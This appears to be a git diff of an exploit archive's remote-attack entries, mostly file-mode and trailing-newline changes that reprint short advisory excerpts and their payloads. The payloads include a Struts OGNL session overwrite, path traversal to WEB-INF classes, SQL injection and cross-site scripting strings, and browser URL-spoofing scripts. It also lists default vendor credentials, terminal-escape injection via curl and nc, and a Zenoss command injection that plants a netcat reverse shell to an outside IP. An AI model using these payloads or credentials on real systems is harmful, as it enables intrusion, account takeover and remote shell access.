<a href="javascript:a();">Start Test</a><br> <a href="javascript:window.location=location.href">Load This Page Again</a><br> <br> <br> <b>List of files that you recently fetched from the internet:</b><br> <textarea rows="10" cols="100" id=t wrap=off>&lt;/textarea&gt; <br> <br> <b>List of images that you recently viewed on the internet:</b><br> <div id=x></div> <br> <br> <iframe width=300 height=200 src="testurl1.url"></iframe> <iframe width=300 height=200 src="testurl2.url"></iframe> \ No newline at end of file +<script> function a() { s=""; h=""; for(i=0;i<window.frames.length;i++) { d=window.frames[i].document; for(j=0;j<d.links.length;j++) { u=d.links[j].text s+=u+"\n"; h+="<img src=\""+u+"\">"; } } document.getElementById("t").value=s; document.getElementById("x").innerHTML=h; } </script> <a href="javascript:a();">Start Test</a><br> <a href="javascript:window.location=location.href">Load This Page Again</a><br> <br> <br> <b>List of files that you recently fetched from the internet:</b><br> <textarea rows="10" cols="100" id=t wrap=off>&lt;/textarea&gt; <br> <br> <b>List of images that you recently viewed on the internet:</b><br> <div id=x></div> <br> <br> <iframe width=300 height=200 src="testurl1.url"></iframe> <iframe width=300 height=200 src="testurl2.url"></iframe> \ No newline at end of file diff --git a/platforms/multiple/remote/32475.sql b/platforms/multiple/remote/32475.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32529.java b/platforms/multiple/remote/32529.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32564.txt b/platforms/multiple/remote/32564.txt old mode 100755 new mode 100644 index e770e16c0..f2598f37e --- a/platforms/multiple/remote/32564.txt +++ b/platforms/multiple/remote/32564.txt @@ -8,4 +8,4 @@ Versions prior to XWork 2.0.6 are vulnerable. Struts 2.0.0 through 2.0.11.2 cont To set #session.user to '0wn3d': -('\u0023' + 'session[\'user\']')(unused)=0wn3d \ No newline at end of file +('\u0023' + 'session[\'user\']')(unused)=0wn3d \ No newline at end of file diff --git a/platforms/multiple/remote/32565.txt b/platforms/multiple/remote/32565.txt old mode 100755 new mode 100644 index 09f0b86b8..ba7546b51 --- a/platforms/multiple/remote/32565.txt +++ b/platforms/multiple/remote/32565.txt @@ -8,4 +8,4 @@ Versions prior to Struts 2.0.12 are vulnerable. http://www.example.com:8080/struts2-blank-2.0.11.1/struts.. http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f -http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/ \ No newline at end of file +http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/ \ No newline at end of file diff --git a/platforms/multiple/remote/32673.java b/platforms/multiple/remote/32673.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32674.cpp b/platforms/multiple/remote/32674.cpp old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32686.xml b/platforms/multiple/remote/32686.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32762.pl b/platforms/multiple/remote/32762.pl index 70275942e..9fff7cb68 100755 --- a/platforms/multiple/remote/32762.pl +++ b/platforms/multiple/remote/32762.pl @@ -175,7 +175,4 @@ chomp($line); } print "\n\n"; close(Userfile); - } - - - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/multiple/remote/32781.txt b/platforms/multiple/remote/32781.txt old mode 100755 new mode 100644 index 20a83c55a..fae76ed9c --- a/platforms/multiple/remote/32781.txt +++ b/platforms/multiple/remote/32781.txt @@ -6,5 +6,4 @@ Attacker-supplied XML and script code would run in the context of the affected b PyBlosxom 1.4.3 is vulnerable; other versions may also be affected. -http://host/path/%3Ccool%3E?flav=atom - \ No newline at end of file +http://host/path/%3Ccool%3E?flav=atom \ No newline at end of file diff --git a/platforms/multiple/remote/32791.c b/platforms/multiple/remote/32791.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32839.txt b/platforms/multiple/remote/32839.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32877.txt b/platforms/multiple/remote/32877.txt old mode 100755 new mode 100644 index 8ad8ad069..35db23ef4 --- a/platforms/multiple/remote/32877.txt +++ b/platforms/multiple/remote/32877.txt @@ -8,4 +8,4 @@ Versions prior to Xlight FTP Server 3.2.1 are affected. The following example input is available: -User: ' OR '1'='1' ;# \ No newline at end of file +User: ' OR '1'='1' ;# \ No newline at end of file diff --git a/platforms/multiple/remote/32920.txt b/platforms/multiple/remote/32920.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32921.txt b/platforms/multiple/remote/32921.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32922.html b/platforms/multiple/remote/32922.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32925.txt b/platforms/multiple/remote/32925.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32944.txt b/platforms/multiple/remote/32944.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32945.txt b/platforms/multiple/remote/32945.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32967.txt b/platforms/multiple/remote/32967.txt old mode 100755 new mode 100644 index 1f2de172c..c6942aeac --- a/platforms/multiple/remote/32967.txt +++ b/platforms/multiple/remote/32967.txt @@ -11,4 +11,4 @@ Versions prior to Openfire 3.6.4 are vulnerable. <username>test2</username> <password>newillegalychangedpassword</password> </query> -</iq> \ No newline at end of file +</iq> \ No newline at end of file diff --git a/platforms/multiple/remote/32971.txt b/platforms/multiple/remote/32971.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32974.txt b/platforms/multiple/remote/32974.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32975.txt b/platforms/multiple/remote/32975.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32977.txt b/platforms/multiple/remote/32977.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32978.txt b/platforms/multiple/remote/32978.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32979.txt b/platforms/multiple/remote/32979.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32980.txt b/platforms/multiple/remote/32980.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32981.txt b/platforms/multiple/remote/32981.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32987.txt b/platforms/multiple/remote/32987.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32994.xml b/platforms/multiple/remote/32994.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32996.txt b/platforms/multiple/remote/32996.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32998.c b/platforms/multiple/remote/32998.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33007.txt b/platforms/multiple/remote/33007.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33023.txt b/platforms/multiple/remote/33023.txt old mode 100755 new mode 100644 index 206a288b2..731c68a2a --- a/platforms/multiple/remote/33023.txt +++ b/platforms/multiple/remote/33023.txt @@ -15,4 +15,4 @@ The following example POST data is available: POST /j_security_check HTTP/1.1 Host: www.example.com -j_username=tomcat&j_password=% \ No newline at end of file +j_username=tomcat&j_password=% \ No newline at end of file diff --git a/platforms/multiple/remote/33033.html b/platforms/multiple/remote/33033.html old mode 100755 new mode 100644 index f4c957ec6..292a572f9 --- a/platforms/multiple/remote/33033.html +++ b/platforms/multiple/remote/33033.html @@ -6,4 +6,4 @@ A remote attacker can exploit this vulnerability to bypass the same-origin polic NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it. -<html> <body onunload='intercept()'> <script> function intercept() { setTimeout('update_page()',10); stop(); } function update_page() { document.getElementById('hideme').style.visibility = "hidden"; document.getElementById('showme').style.visibility = "visible"; document.getElementById('sitename').innerHTML = document.location; } </script> <span id=showme style="visibility: hidden"> <font size=+1 color=teal>This is a spoofed version of <b><span id=sitename></span></b></font> </span> <br> <span id=hideme>Please navigate away from this page.</span> \ No newline at end of file +<html> <body onunload='intercept()'> <script> function intercept() { setTimeout('update_page()',10); stop(); } function update_page() { document.getElementById('hideme').style.visibility = "hidden"; document.getElementById('showme').style.visibility = "visible"; document.getElementById('sitename').innerHTML = document.location; } </script> <span id=showme style="visibility: hidden"> <font size=+1 color=teal>This is a spoofed version of <b><span id=sitename></span></b></font> </span> <br> <span id=hideme>Please navigate away from this page.</span> \ No newline at end of file diff --git a/platforms/multiple/remote/33047.html b/platforms/multiple/remote/33047.html old mode 100755 new mode 100644 index 2ff8c3911..ecf6414f9 --- a/platforms/multiple/remote/33047.html +++ b/platforms/multiple/remote/33047.html @@ -4,4 +4,4 @@ WebKit is prone to a cross-domain scripting vulnerability. A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible. -<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe> \ No newline at end of file +<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe> \ No newline at end of file diff --git a/platforms/multiple/remote/33064.txt b/platforms/multiple/remote/33064.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33067.txt b/platforms/multiple/remote/33067.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33078.txt b/platforms/multiple/remote/33078.txt old mode 100755 new mode 100644 index fa00226fe..694ff3a38 --- a/platforms/multiple/remote/33078.txt +++ b/platforms/multiple/remote/33078.txt @@ -9,4 +9,4 @@ ProCurve Threat Management Services zl Module J9155A running vST.1.0.090213 firm 1. Go to VPN-->Certificates--> CRL page and load a CRL list. 2. Save the entire configuration. 3. Reboot the TMS zl Module. -4. Once the TMS zl Module is available, go to VPN--> Certificates--> CRL page and the CRL is no longer available. \ No newline at end of file +4. Once the TMS zl Module is available, go to VPN--> Certificates--> CRL page and the CRL is no longer available. \ No newline at end of file diff --git a/platforms/multiple/remote/33079.txt b/platforms/multiple/remote/33079.txt old mode 100755 new mode 100644 index 259aa0e8a..4ab849ae9 --- a/platforms/multiple/remote/33079.txt +++ b/platforms/multiple/remote/33079.txt @@ -6,4 +6,4 @@ The attacker may leverage this issue to execute arbitrary script code in the bro This vulnerability affects Oracle WebLogic Server 10.3. -http://www.example.com:7011/consolehelp/console-help.portal?_nfpb=true&_pageLabel=ConsoleHelpSearchPage&searchQuery="><script>alert('DSECRG')</script> \ No newline at end of file +http://www.example.com:7011/consolehelp/console-help.portal?_nfpb=true&_pageLabel=ConsoleHelpSearchPage&searchQuery="><script>alert('DSECRG')</script> \ No newline at end of file diff --git a/platforms/multiple/remote/33081.cpp b/platforms/multiple/remote/33081.cpp old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33082.txt b/platforms/multiple/remote/33082.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33084.txt b/platforms/multiple/remote/33084.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33118.html b/platforms/multiple/remote/33118.html old mode 100755 new mode 100644 index 793af8d67..5f7513168 --- a/platforms/multiple/remote/33118.html +++ b/platforms/multiple/remote/33118.html @@ -8,4 +8,4 @@ Safari 4.0.1 is affected; other versions may also be vulnerable. This issue is similar to the vulnerability discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability). -</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a = window.open("http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian \ No newline at end of file +</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a = window.open("http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian \ No newline at end of file diff --git a/platforms/multiple/remote/33123.html b/platforms/multiple/remote/33123.html old mode 100755 new mode 100644 index 2ea90a2e9..94a6f5f54 --- a/platforms/multiple/remote/33123.html +++ b/platforms/multiple/remote/33123.html @@ -8,4 +8,4 @@ Chrome 2.0.172.37 is vulnerable; other versions may also be affected. This issue is similar to the vulnerabilities discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability) and BID 35829 (Apple Safari Error Page Address Bar URI Spoofing Vulnerability). -<center> <h1>Chrome about:blank Spoof</h1> </center> This vulnerability is based on http://www.securityfocus.com/bid/35829/ and http://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood. <p> <a href='javascript:spoof()'><<h2>test Spoof !!</h2></a> <p> <script> function spoof() { a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,') a.document.write('<H1>FAKE PAGE<\h1>') a.document.write('<title>test</title>') a.stop (); } </script> \ No newline at end of file +<center> <h1>Chrome about:blank Spoof</h1> </center> This vulnerability is based on http://www.securityfocus.com/bid/35829/ and http://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood. <p> <a href='javascript:spoof()'><<h2>test Spoof !!</h2></a> <p> <script> function spoof() { a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,') a.document.write('<H1>FAKE PAGE<\h1>') a.document.write('<title>test</title>') a.stop (); } </script> \ No newline at end of file diff --git a/platforms/multiple/remote/33124.txt b/platforms/multiple/remote/33124.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33164.txt b/platforms/multiple/remote/33164.txt old mode 100755 new mode 100644 index 6bcc12354..90ddaef7e --- a/platforms/multiple/remote/33164.txt +++ b/platforms/multiple/remote/33164.txt @@ -17,4 +17,4 @@ var Overflow = "31337" + 0.313373133731337313373133731337...; Example 2: --------- <img width=0.3133731337313373133731337... src="31337.jpg"> ---------- \ No newline at end of file +--------- \ No newline at end of file diff --git a/platforms/multiple/remote/33192.php b/platforms/multiple/remote/33192.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33203.txt b/platforms/multiple/remote/33203.txt old mode 100755 new mode 100644 index 74d1b4890..700b4beb0 --- a/platforms/multiple/remote/33203.txt +++ b/platforms/multiple/remote/33203.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to bypass certain security restrictions. Succ The following sample SQL expression is available: -x=y=z \ No newline at end of file +x=y=z \ No newline at end of file diff --git a/platforms/multiple/remote/33210.txt b/platforms/multiple/remote/33210.txt old mode 100755 new mode 100644 index 15ac5110c..bcbbcbdb3 --- a/platforms/multiple/remote/33210.txt +++ b/platforms/multiple/remote/33210.txt @@ -8,4 +8,4 @@ NOTE: This issue may be related to the issue documented in BID 37086 (HP Operati Attackers can exploit this issue using readily available tools. The following authentication credentials are available: -ovwebusr:OvW*busr1 \ No newline at end of file +ovwebusr:OvW*busr1 \ No newline at end of file diff --git a/platforms/multiple/remote/33211.txt b/platforms/multiple/remote/33211.txt old mode 100755 new mode 100644 index 1f1cb17ac..0fae11642 --- a/platforms/multiple/remote/33211.txt +++ b/platforms/multiple/remote/33211.txt @@ -6,4 +6,4 @@ Operations Dashboard 2.1 for Windows is vulnerable; other versions may also be v Attackers can exploit this issue using readily available tools. The following authentication credentials are available: -j2deployer:j2deployer \ No newline at end of file +j2deployer:j2deployer \ No newline at end of file diff --git a/platforms/multiple/remote/33215.txt b/platforms/multiple/remote/33215.txt old mode 100755 new mode 100644 index 5c9ced051..cd4028e18 --- a/platforms/multiple/remote/33215.txt +++ b/platforms/multiple/remote/33215.txt @@ -8,4 +8,4 @@ IBM Tivoli Identity Manager 5.0.0.5 is vulnerable; other versions may also be af The following example input was provided: -<script>alert("bbbbb")</script> \ No newline at end of file +<script>alert("bbbbb")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/33310.nse b/platforms/multiple/remote/33310.nse old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33316.java b/platforms/multiple/remote/33316.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33363.txt b/platforms/multiple/remote/33363.txt old mode 100755 new mode 100644 index 3128de2be..b52d8c933 --- a/platforms/multiple/remote/33363.txt +++ b/platforms/multiple/remote/33363.txt @@ -11,4 +11,4 @@ This issue affects Opera 10.01; other versions may also be affected. <script> var a=0.<?php echo str_repeat("1",296450); ?>; -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/multiple/remote/33379.txt b/platforms/multiple/remote/33379.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33399.txt b/platforms/multiple/remote/33399.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33405.txt b/platforms/multiple/remote/33405.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33489.txt b/platforms/multiple/remote/33489.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33490.txt b/platforms/multiple/remote/33490.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33497.txt b/platforms/multiple/remote/33497.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33498.txt b/platforms/multiple/remote/33498.txt old mode 100755 new mode 100644 index fc6b7881e..87f6a3bb7 --- a/platforms/multiple/remote/33498.txt +++ b/platforms/multiple/remote/33498.txt @@ -9,4 +9,4 @@ Varnish 2.0.6 is vulnerable; other versions may also be affected. The following example is available: echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload -nc localhost 80 < payload \ No newline at end of file +nc localhost 80 < payload \ No newline at end of file diff --git a/platforms/multiple/remote/33499.txt b/platforms/multiple/remote/33499.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33500.txt b/platforms/multiple/remote/33500.txt old mode 100755 new mode 100644 index 9f1871835..2eb2d5148 --- a/platforms/multiple/remote/33500.txt +++ b/platforms/multiple/remote/33500.txt @@ -9,4 +9,4 @@ This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload -nc localhost 80 < payload \ No newline at end of file +nc localhost 80 < payload \ No newline at end of file diff --git a/platforms/multiple/remote/33503.txt b/platforms/multiple/remote/33503.txt old mode 100755 new mode 100644 index 5d75579c2..3930a9498 --- a/platforms/multiple/remote/33503.txt +++ b/platforms/multiple/remote/33503.txt @@ -10,4 +10,4 @@ Orion Application Server 2.0.7 is vulnerable; other versions may also be affecte curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload -nc localhost 80 < payload \ No newline at end of file +nc localhost 80 < payload \ No newline at end of file diff --git a/platforms/multiple/remote/33504.txt b/platforms/multiple/remote/33504.txt old mode 100755 new mode 100644 index 1c328b3df..0998fc858 --- a/platforms/multiple/remote/33504.txt +++ b/platforms/multiple/remote/33504.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands in a terminal. Boa Webserver 0.94.14rc21 is vulnerable; other versions may also be affected. -curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a \ No newline at end of file +curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a \ No newline at end of file diff --git a/platforms/multiple/remote/33536.txt b/platforms/multiple/remote/33536.txt old mode 100755 new mode 100644 index 0250c8fa1..31d940d10 --- a/platforms/multiple/remote/33536.txt +++ b/platforms/multiple/remote/33536.txt @@ -11,4 +11,4 @@ http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultA http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail -http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping \ No newline at end of file +http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping \ No newline at end of file diff --git a/platforms/multiple/remote/33553.txt b/platforms/multiple/remote/33553.txt old mode 100755 new mode 100644 index 019df5d17..9763b57bf --- a/platforms/multiple/remote/33553.txt +++ b/platforms/multiple/remote/33553.txt @@ -13,4 +13,4 @@ Sun Java System Web Proxy Server 4.0 without Service pack 13 buf = "PUT / HTTP/1.0\n" buf += "Authorization: Digest " buf += "ABCD,"*1000 -buf += "\n\n" \ No newline at end of file +buf += "\n\n" \ No newline at end of file diff --git a/platforms/multiple/remote/33562.html b/platforms/multiple/remote/33562.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33569.txt b/platforms/multiple/remote/33569.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33570.txt b/platforms/multiple/remote/33570.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33577.txt 